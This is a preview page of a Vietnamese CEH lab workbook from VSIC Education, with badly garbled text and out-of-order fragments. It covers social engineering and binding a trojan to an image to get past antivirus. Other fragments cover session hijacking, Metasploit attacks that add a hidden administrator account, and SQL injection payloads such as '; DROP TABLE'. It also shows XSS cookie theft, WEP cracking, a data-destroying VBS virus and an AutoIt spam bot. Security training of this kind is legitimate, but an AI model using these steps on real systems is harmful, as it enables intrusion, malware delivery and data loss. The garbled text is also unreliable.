Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống
1
/ 47 trang
THÔNG TIN TÀI LIỆU
Thông tin cơ bản
Định dạng
Số trang
47
Dung lượng
4,45 MB
Nội dung
Giáotrìnhbài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 74 Bài 7: Social Engineering I/ Gii Thiu K thut la đo (Social Engineering) là mt th thut đc nhiu hacker s dng cho các cuc thâm nhp vào các h thng mng, máy tính. ây là mt trong nhng phng thc hiu qu đ đánh cp mt khu, thông tin, tn công vào h thng. Di đây là câu chuyn có tht v mt trong nhng hacker ni ting nht th gii trong vài nm tr li đây - Kevin Mitnick (M, tng b 8 nm tù vì ti tn công vào h thng máy tính), chuyên gia hàng đu v k thut Social Engineering. Lên k hoch tn công vào công ty X, Kevin vn dng k nng này đ dò tìm thông tin liên quan đn ông tng giám đc và mt tr lý ca ông này. Li dng lúc hai ngi đi công tác, anh ta s dng Call ID gi, nhái ging nói ca viên tr lý đ gi đn qun tr mng công ty, yêu cu gi mt kh u đng nhp vào h thng ca tng giám đc vì ngài đã quên mt khu. Qun tr viên kim tra mt vài thông tin v "viên tr lý", nhng Kevin đã có đ thông tin và s khôn ngoan đ tr li. Kt qu là Kevin đã ly đc mt khu và kim soát toàn b h thng mng ca công ty X. Mt hình thc la đo khác: Mt ngày xu tri nào đó, bn nhn đc đ in thoi, đu dây bên kia là mt ging nói ngt ngào: "Chào anh, dch v mà anh đang s dng ti công ty chúng tôi hin đang b trc trc vi account (tài khon) ca anh. ngh anh gi gp thông tin v tài khon cho chúng tôi đ điu chnh li". Mi nghe qua tng nh đây là mt kiu la thô thin, nhng xác sut thành công rt cao, đc bit khi ging nói đó d thng nh my cô trc tng đài 1080! Phng cách la đo tng t là dùng k thut "Fake Email Login". V nguyên tc, mi khi đng nhp vào hp th thì chúng ta phi đin thông tin tài khon gm username và password ri gi thông tin đn mail server đ x lý. Li dng điu này, hacker đã thit k các trang đng nhp gi (Fake Login) đ các thông tin đc gi đn cho h. Tóm li, k thut Social Engineering rt đa dng, phong phú và cng ht sc nguy him do tính hiu qu và s ph bin. K thut này không đòi hi phi s dng quá nhiu yu t k thut, thm chí không có liên quan đn k thut thun túy (non-technical). Hacker có th thc hin phng cách này thông qua th tín, e-mail, đin thoi, tip xúc trc tip, thông qua ngi quen, các mi quan h cá nhân nhm dn d, khai thác các thông tin do vô tình b tit l t phía ngi dùng. VN, k thut này còn khá mi nên không him trng hp b đánh la mt cách d dàng. Chng hn nm ngoái, hàng lot game th MU Global đã mt sch sành sanh tài sn (o), khi ngây th đin thông tin tài khon ca mình vào mt e-mail gi mo admin MU ca hacker! (Trích dn) II/ Các bài Lab: Bài Lab 1: Gi email nc đính kèm Trojan Giáotrìnhbài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 75 thc hin bài Lab này, ta s dng chng trình Mini-binder đ ghép file trojan vi hình nh, thay đi icon và chng trình Outlook đ gi email nc danh. Ghép file hình nh và file trojan, đu tiên ta to 1 file trojan, ly 1 file nh và file ico bt k đ ghép. Ta s dng lnh ‘ MMB “60.ico” “svchost.exe” “cathu.jpg” “trojanhao.exe” ‘ đ ghép file trojan svchost.exe vi cathu.jpg và vi icon là 60.ico. Tip theo, ta nén file trojan mi bng Winrar li nhiu ln đ tránh chng trình Anti- virus(tùy theo phiên bn Anti-virus, tuy nhiên hu ht các trojan không qua mt đc các chng trình này) và thay đi thông tin ca outlook. Giáotrìnhbài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 76 Ta vào ToolåOptionåMail setupåView Accountå Chn Account cn thay đi và thay đi thông tin Your Name và E-mail Address. Tip theo Attach file đính kèm vào và gi Email đi. Trong bài Tác gi gi ti đa ch email mailtestsniff@yahoo.com , và sau đó check mail đ kim tra th xem mail đã đn cha. Giáotrìnhbài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 77 Bài 8: Session Hijacking I/ Gii thiu: Nh ta đã bit v sniffer (nghe lén trong mng), Hacker có th ly bt k thông tin gì không đc mã hóa, hay có th fake CA đ có th ly thông tin trong giao thc HTTPS, bây gi ta có thêm 1 k thut na là session hijacking. thc hin đc bài lab này trc tiên ta phi s dng ARP spoof, sau đó s dng phn mm T-sight hay Hunt đ giành ly session t phía máy nn nhân. II/ Thc hin bài Lab Trong bài Lab, tác gi s dng Vmware đ thc hi n, s dng máy đ th nghip TELNET và SSH. Còn 2 máy còn li 1 s dng Window 2000(đã cài sn tool T-sight) và 1 s Linux đ test SSH. Vic cài đt phn mm khá d dàng, bn cn phi thêm phn driver và chuyn v IP 192.168.200.0/24 do đang s dng bn Trial. Giáotrìnhbài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 78 Sau khi cài đt xong, trên máy 192.168.200.1 thit lp cho phép các máy khác telnet. Và t máy 192.168.200.2 telnet đn máy 192.168.200.1. Và d liu thu đc t máy 192.168.200.2, s dng tính nng Take Over trong Tool T-sight đ ly session. Giáotrìnhbài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 79 Sau khi Session b ly, session t máy Telnet s b “ Lost connection” và ngi s dng trong trng hp này không bit là mình b “Lost Connection “bi nguyên nhân nào. Bây gi ta bt Service SSH ca máy Linux bng lnh “ Service sshd” và test th session hijacking đi vi traffic ssh. Giáotrìnhbài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 80 Bài 9: Hacking Web Server I/ Gii thiu: Thông thng đ Hacking 1 Web Server, Hacker thng phi xem th Web Server đang chy h điu hành gì và chy nhng sercice gì trên đó, h điu hành thông thng là các h điu hành Win 2000 Server, Win 2003 Server, Redhat.v.v. Các Service bao gm Apache, IIS, FTP Server v.v. Nu nh 1 trong nhng Service ca H điu hành b li hay service khác b li có th dn ti vic mt quyn kim soát ca h thng. Trong bài thc hành ca phn này, tác gi gii thiu li ca h điu hành là DCOM và li ng dng khác là Server-U, Apache(FTP Server). T nhng li này, ta có th kim soát hoàn toàn máy nn nhân. II/ Thc Hin bài lab. Bài Lab 1: Tn công Web Server Win 2003(li Apache) bit đc máy Server ca h thng có b li hay không, ta s dng dng phn mm quét đ kim tra. (Phn này đã đc hc trong scaning). Giáotrìnhbài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 81 Ta không thy thông tin v FTP Server đây, do phn mm Retina ch có tính nng nhn din các Service ca Microsoft và nhng Service thông dng. Còn các Service không thông dng hn thì phn mm ch thy di dng m port. Trong trng hp này ta thy m port 21. Ta s dng Metasploit đ khai thác li Apache và ly đc (Console). Rank Vulnerability Name Count 1. echo service 1 2. ASN.1 Vulnerability Could Allow Code Execution 1 3. Windows Cumulative Patch 835732 Remote 1 4. Null Session 1 5. No Remote Registry Access Available 1 6. telnet service 1 7. DCOM Enabled 1 8. Windows RPC Cumulative Patch 828741 Remote 1 9. Windows RPC DCOM interface buffer overflow 1 10. Windows RPC DCOM multiple vulnerabilities 1 11. Apache 1.3.27 0x1A Character Logging DoS 1 12. Apache 1.3.27 HTDigest Command Execution 1 13. Apache mod_alias and mod_rewrite Buffer Overflow 1 14. ApacheBench multiple buffer overflows 1 15. HTTP TRACE method supported 1 Giáotrìnhbài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 82 Bây gi chúng ta s tìm cách Remote Desktop vào máy 192.168.200.1. Trc tiên ta to 1 user và add user này vào nhóm admin bng s dng lnh. Net user vsichao vsichao /add //thêm user Net Localgroup Administrators vsichao /add //đa user vào nhóm Admin Ta có th kim ta li bng lnh “ Net user” đ kim tra th user ca mình đã đc quyn admin hay cha. Tip theo ta th remote Desktop vào máy bng lnh “ mstsc /v 192.168.200.6” . Nu không đc ta s dng file Openrdp.vbs đ m Remote Desktop. Ta s dng chng trình Cisco TFTP Server đ đy file này Server nn nhân. S dng lnh tftp máy nn nhân đ ly file Giáotrìnhbài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 83 Add user vào và nâng quyn lên Administrator. Remote Desktop vào vi user là cehclass thành công, nh vy ta đã hoàn toàn kim soát đc máy nn nhân. [...]... Giáotrìnhbài t p C|EH Tài li u dành cho h c viên Bài Lab 4: Authorization Failure u tiên ta vào xem các account c a user “jc” password “jc789” Ta th y account Number là 520 432 0422040005, 520 432 0422040006, 520 432 0422040007, 520 432 0422040008 User jc ch quán lý c các account thông s trên Tuy nhiên ta chú ý n ph n URL khi s d ng tính n ng “View Transaction” VSIC Education Corporation Trang 89 Giáo trình. . .Giáo trìnhbài t p C|EH Bài lab 2: Khai thác l i ng d ng Server U T ng t nh bài trên, ta s d ng ch ng trinh nmap và s d ng metaesploit t n công VSIC Education Corporation Tài li u dành cho h c viên xác nh version c a ServerU Trang 84 Giáotrìnhbài t p C|EH Tài li u dành cho h c viên Bài 10: WEB APPLICATION HACKING I/ Gi i thi u: ng d ng Web... user: ' %2b convert (int,(select Vpass from Vtable where Vuser='admin') )-5 ) Run command SQL: run command b n có th dùng d u ";" Structure: VSIC Education Corporation Trang 93 Giáotrìnhbài t p C|EH Tài li u dành cho h c viên login page::::: user:' ; [command] -vd: '; DROP TABLE VTABLE-II/ Th c Hành Bài Lab Trong bài này Hacker (máy 192.168.1.44) s thông qua Port Web t n công vào Server... ; -; ; -; -; Tac Gia: Kevin Duong - KVD ; Phan Mem: DKC Bot ; Phien Ban: 1.1 ; Cong Dung: Quang cao Website thong qua Y!M ; Phat Hanh: 1-9 -2 006 ; -; Thiet Lap #NoTrayIcon $website = "http://daokhuc.be" ; Lay... Education Corporation Trang 85 Giáotrìnhbài t p C|EH Sau ó ta submit th y xu t hi n Tài li u dành cho h c viên post script này lên Ta s d ng F5 Refresh l i trình duy t và Lúc này trình duy t c a n n nhân vô tình ã th c hi n script c user post lên Server D a vào script này, tin t c có th n c p cookie c a n n nhân và log in vào h th ng Bài Lab 2: Insufficient Data Validation Trong bài Lab này khi chuy n ti... www.wildpackets.com/support/hardware/atheros30_driver i v i Cisco Aironet ta c ng download driver t trang web này Sau ó ta ti n hành cài t cho Card Wifi VSIC Education Corporation Trang 101 Giáotrìnhbài t p C|EH Ti p theo ta s d ng Airdump Tài li u dành cho h c viên thu packet t Access Point Ta ch n lo i Card là Atheros, Channel là 6 và output file là “hack.ivs” VSIC Education Corporation Trang 102 Giáotrìnhbài t p C|EH Tài... c tìm th y là Athen T key 128 bit, nh ng th i gian ch s lâu h n ng t nh v y i v i WEP WEP key 128 bit VSIC Education Corporation Trang 104 Giáo trìnhbài t p C|EH Tài li u dành cho h c viên Bài 13: VIRUS I/ Gi i thi u: (tham kh o bài c thêm) II/ Th c hành Lab: Bài 1: Virus phá h y d li u máy Ta có th vi t d dàng 1 virus phá h y máy b ng nh ng hàm Format hay delete trong ngôn ng VBS nh sau: msgbox"Error... Transaction” VSIC Education Corporation Trang 89 Giáo trìnhbài t p C|EH Tài li u dành cho h c viên Ta thay thông s 520 432 0422040005 b ng thông s 520 432 0422040004(thông s này không thu c account qu n lý c a user jc) Nh v y web site ang b l i phân quy n VSIC Education Corporation Trang 90 Giáo trìnhbài t p C|EH Tài li u dành cho h c viên Bài 11: SQL INJECTION I/ Gi i thi u v SQL Injection: ây là K... Education Corporation Trang 108 Giáo trìnhbài t p C|EH Tài li u dành cho h c viên Send("^v {ENTER}{ENTER}") Send("^m") Send("{DOWN}") Send("^{SHIFTDOWN}{END}{SHIFTUP}") Send("{ENTER}") Send("^v {ENTER}") BlockInput (0) EndIf Sleep(1800000) WEnd ; -; ; -D a vào o n code này, ta... C|EH Bây gi ta s d ng ch POST lên Server Tài li u dành cho h c viên ng trình Webscarab làm http proxy và thay i thông s c K t qu tr v t Server vi c chuy n ti n v n thành công VSIC Education Corporation Trang 87 Giáo trìnhbài t p C|EH Tài li u dành cho h c viên Ta ki m tra trong Transaction th y có l u l i vi c chuy n ti n Bài Lab 3: Cookie Manipulation Trong lúc login, ta xem trong Cookie có tham s . dn) II/ Các bài Lab: Bài Lab 1: Gi email nc đính kèm Trojan Giáo trình bài tp C|EH Tài liu dành cho hc viên VSIC Education Corporation Trang 75 thc hin bài Lab này, ta s dng. hin đc bài lab này trc tiên ta phi s dng ARP spoof, sau đó s dng phn mm T-sight hay Hunt đ giành ly session t phía máy nn nhân. II/ Thc hin bài Lab Trong bài Lab, tác gi. Server). T nhng li này, ta có th kim soát hoàn toàn máy nn nhân. II/ Thc Hin bài lab. Bài Lab 1: Tn công Web Server Win 2003(li Apache) bit đc máy Server ca h thng có